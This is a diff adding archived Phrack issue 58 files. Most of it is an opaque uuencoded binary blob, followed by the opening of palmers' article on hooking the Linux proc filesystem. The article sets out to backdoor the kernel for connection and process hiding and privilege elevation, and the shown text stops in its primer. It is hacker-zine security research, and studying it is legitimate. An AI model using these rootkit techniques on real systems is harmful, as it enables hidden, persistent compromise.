+MQS6VI_:+4$A)//*+`S*.WJ4Z0=\6"9NZ'3N;X!XL0>5'J9'K4:5GGXR8E[]^
+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
+F>'AX>'AX>'AX>'AX>'AX>'AX>'AX>'AX>'C_S_T/[21E80#(````
+`
+end
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack58/6.txt b/phrack58/6.txt
new file mode 100644
index 0000000..eaeede6
--- /dev/null
+++ b/phrack58/6.txt
@@ -0,0 +1,1069 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x06 of 0x0e
+
+|=-----=[ Sub proc_root Quando Sumus (Advances in Kernel Hacking) ]=-----=|
+|=-----------------------------------------------------------------------=|
+|=-----------------=[ palmers <palmers@team-teso.net> ]=-----------------=|
+
+--[ Contents
+
+  1 - Introduction
+
+  2 - VFS and Proc Primer
+    2.1 - VFS and why Proc?
+    2.2 - proc_fs.h
+    2.3 - The proc_root
+
+  3 - Where to Go?
+    3.1 - Securing?
+    3.2 - Denial of Service
+    3.3 - Connection Hiding
+    3.4 - Elevation of Privileges
+    3.5 - Process Hiding
+    3.6 - Other Applications
+
+  4 - Conclusion
+
+  5 - Reference
+
+  Appendix A: prrf.c
+
+
+
+--[ 1 - Introduction
+
+  "The nineteenth century dislike of romanticism is the rage of Caliban
+seeing his own face in the glass.
+The nineteenth century dislike of realism is the rage of Caliban not seeing
+his own face in the glass."
+		- Oscar Wilde, the preface to "The picture of Dorian Gray"
+
+  Since I concern here on hacking, not literature, lets restate it. Our
+romanticism is security, realism is its shadow. This article is about the
+hacker Caliban. Our glass shall be the Linux kernel.
+
+  Not the whole kernel; especially the proc filesystem. It offers interesting
+features and they are used a lot in userland.
+
+  I will only describe this techniques for use in Linux kernel modules (LKM). It
+is up to the reader to port these techniques. Though, the techniques are port-
+able, their use will be very bounded on other unices. The proc filesystem,
+developed to the extends as in Linux, is not that extended in other unices. In
+general, it lists one directory per process. In Linux it can be used to gather
+plenty of information. Many programs rely on it. More informations can be
+found in [7] and [8].
+
+  Older versions of UNIX and HP-UX 10.x do not provide the proc filesystem.
+Process data, such as that obtained by the ps(1) command, is obtained by reading
+kernel memory directly. This requires superuser permissions and is even less
+portable than the proc filesystem structure.
+
+
+--[ 2 - VFS and Proc Primer
+
+  First I will line out the needed basics to understand the techniques
+explained later on. Then proc filesystem design will be investigated,
+finally we will dive into, well, the roof top.
+
+
+--[ 2.1 - VFS and why Proc?
+
+  The kernel provides a filesystem abstraction layer, called virtual filesystem
+or VFS. It is used to provide a unified view on any filesystem from the
+userland (see [1] for details). More on this methodology can be found in [2].
+
+  We will not look at proc from VFS view. We look at the un-unified filesystem,
+which is at the implementation level of the proc filesystem. This has a simple
+reason. We want to apply changes to proc and it still should look like any other
+filesystem.
+
+  Did I already mention why proc is aimed at by this article? it has two
+attributes that make it interesting:
+
+	1. it is a filesystem.
+	2. it lives completely in kernel memory.
+
+  Since it is a filesystem all access from the userland is limited to the
+functionality of VFS layer provided by the kernel, namely read, write, open
+and alike system calls (besides other access methods, see [3]).
+
+  I will elaborate on the question: How can the kernel be backdoored without
+changing system calls.
+
+
+--[ 2.2 - proc_fs.h
+
+  This subchapter will concern on the file named proc_fs.h; commonly in
+~/include/linux/, where ~ is the root of you kernel source tree. Ok, here
+we go for 2.2 series:
+
+/*
+ * This is not completely implemented yet. The idea is to
+ * create an in-memory tree (like the actual /proc filesystem
+ * tree) of these proc_dir_entries, so that we can dynamically
+ * add new files to /proc.
+ *
+ * The "next" pointer creates a linked list of one /proc directory,
+ * while parent/subdir create the directory structure (every
